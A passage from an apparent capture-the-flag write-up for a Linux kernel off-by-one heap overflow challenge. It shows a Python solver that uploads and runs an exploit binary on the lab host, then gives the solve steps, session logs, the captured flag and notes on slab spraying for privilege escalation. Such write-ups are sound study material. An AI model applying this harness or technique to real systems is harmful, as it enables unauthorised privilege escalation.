    for i in range(max_attempts):
128
        tpl = tuples[i % len(tuples)]
129
        cmd = f"/tmp/e {tpl}"
130
        print(f"[try] attempt={i+1} cmd={cmd}")
131
        send_line(sock, cmd)
132
        out, state = recv_until(sock, 40, want_prompt=True)
133
        all_out += out
134

135
        m = FLAG_RE.search(all_out)
136
        if m:
137
            return all_out, "flag", m.group(0).decode(errors="ignore")
138

139
        if state in ("panic", "eof", "busy", "pow_wrong"):
140
            return all_out, state, ""
141

142
        if state == "timeout":
143
            return all_out, "timeout", ""
144

145
    return all_out, "attempts_done", ""
146

147

148
def main():
149
    host = "ctf.vulnbydefault.com"
150
    bin_path = "exploit"
151

152
    port_str = input("Enter port number: ").strip()
153
    if not port_str:
154
        print("port is required")
155
        return 1
156
    port = int(port_str)
157

158
    tuples = [
159
        "0x04 220 10 900 3 2000 6 20",
160
        "0x04 220 6 900 3 2500 6 20",
161
        "0x04 220 6 900 3 2000 6 20",
162
        "0x04 220 8 900 3 2000 6 20",
163
    ]
164

165
    if not os.path.exists(bin_path):
166
        print(f"binary not found: {bin_path}")
167
        return 1
168

169
    print(f"[conn] connecting to {host}:{port}")
170
    sock = None
171
    try:
172
        sock, boot = connect_and_pow(host, port)
173
        m0 = FLAG_RE.search(boot)
174
        if m0:
175
            print(m0.group(0).decode(errors="ignore"))
176
            return 0
177

178
        up_out, up_state = upload_exploit(sock, bin_path)
179
        m1 = FLAG_RE.search(up_out)
180
        if m1:
181
            print(m1.group(0).decode(errors="ignore"))
182
            return 0
183
        if up_state != "prompt":
184
            print(f"[conn] upload failed state={up_state}")
185
            return 1
186

187
        out, state, flag = attempt_on_connection(sock, tuples, len(tuples))
188
        if flag:
189
            print(f"[+] FLAG {flag}")
190
            return 0
191

192
        print(f"[conn] ended state={state}")
193
        if state == "attempts_done":
194
            try:
195
                send_line(sock, "exit")
196
                recv_until(sock, 20, want_prompt=False)
197
            except Exception:
198
                pass
199

200
    except Exception as e:
201
        print(f"[conn] error: {e}")
202
    finally:
203
        if sock is not None:
204
            try:
205
                sock.close()
206
            except Exception:
207
                pass
208

209
    print("[-] no flag")
210
    return 1
211

212

213
if __name__ == "__main__":
214
    raise SystemExit(main())

6. Solve Workflow (Step by Step)#

Prerequisites#

Save the embedded C source above as exploit.c
Compile it to a local binary named exploit
Google Colab notebook with GPU runtime enabled
colab gpu.py pasted into a Colab code cell

Compile command:

1
gcc -O2 -o exploit exploit.c

Step 1: Start the Remote Solver#

1
cd feedback/
2
python3 remote_manual_pow.py

1
Enter port number: 12625
2
[conn] connecting to ctf.vulnbydefault.com:12625
3
[pow] bits=32 resource=avvDFOzS64YNPLqO
4
[pow] challenge: Send the output of: hashcash -mb32 avvDFOzS64YNPLqO
5

6
>>> Solve this in Google Colab, then paste the stamp below <<<
7

8
Stamp:

Step 2: Solve PoW in Google Colab#

Run the Colab cell. When prompted, paste the challenge:

1
POW Challenge: hashcash -mb32 avvDFOzS64YNPLqO

The GPU solver finds the stamp in seconds:

1
[SUCCESS] 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763

Step 3: Paste Stamp Back#

Copy the stamp from Colab and paste it back in the local terminal:

1
Stamp: 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763

Step 4: Exploit Runs Automatically#

The script uploads the exploit binary via base64, decodes it on the remote VM, and runs it with multiple parameter tuples:

1
[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
2
[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

7. Full Solve Session Log#

1
Enter port number: 12625
2
[conn] connecting to ctf.vulnbydefault.com:12625
3
[pow] bits=32 resource=avvDFOzS64YNPLqO
4
[pow] challenge: Send the output of: hashcash -mb32 avvDFOzS64YNPLqO
5

6
>>> Solve this in Google Colab, then paste the stamp below <<<
7

8
Stamp: 1:32:260305:avvDFOzS64YNPLqO::gX9574:880dd763
9
[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
10
[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

Failed Attempts Before Success#

Attempt 1 (port 7239): Exploit ran but timed out - missed the race window.

1
[try] attempt=1 cmd=/tmp/e 0x04 220 10 900 3 2000 6 20
2
[conn] ended state=timeout
3
[-] no flag

Attempt 2 (port 7239): QEMU lock contention - another instance was still running.

1
[conn] error: remote busy (qemu lock)
2
[-] no flag

Attempt 3 (port 12625): First-try success on a fresh port.

1
[+] FLAG VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}

8. Key Takeaways#

Off-by-one matters. A single byte overflow in the kernel heap is enough for full privilege escalation when combined with the right slab spray technique.
The exploit is probabilistic. It relies on timing-sensitive race conditions between cred allocation, the overflow, and the spray. Not every attempt succeeds - retrying on a fresh port is often necessary.
GPU acceleration is practical for PoW. A 32-bit hashcash challenge that would take minutes on CPU is solved in seconds on a Google Colab T4 GPU using a custom CUDA kernel.
Possible outcome states:
- FLAG VBD{...} - exploit succeeded, flag captured
- timeout - exploit missed the race window
- remote busy (qemu lock) - another QEMU instance holds the lock
- panic - kernel crash during the exploit attempt

9. Files Used#

File	Purpose
Embedded exploit source code in this writeup	Kernel exploit source and build input
`exploit` (compiled locally)	Binary uploaded to remote VM
`remote_manual_pow.py`	Remote solver with manual PoW
`colab gpu.py`	CUDA hashcash solver for Google Colab

Flag#

1
VBD{On3_byt3_a_dr3am_w0rk1ng_w1th_p1p3s_316dbee3615588c7efe25ee55cd3c281}